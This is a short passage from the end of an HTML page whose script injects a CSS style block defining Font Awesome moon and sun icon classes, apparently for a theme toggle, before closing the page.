        const faStyle = document.createElement('style');
        faStyle.textContent = `
            .fas {
                font-family: 'Font Awesome 6 Free';
                font-weight: 900;
            }
            .fa-moon:before { content: "\\f186"; }
            .fa-sun:before { content: "\\f185"; }
        `;
        document.head.appendChild(faStyle);
    </script>
</body>
</html>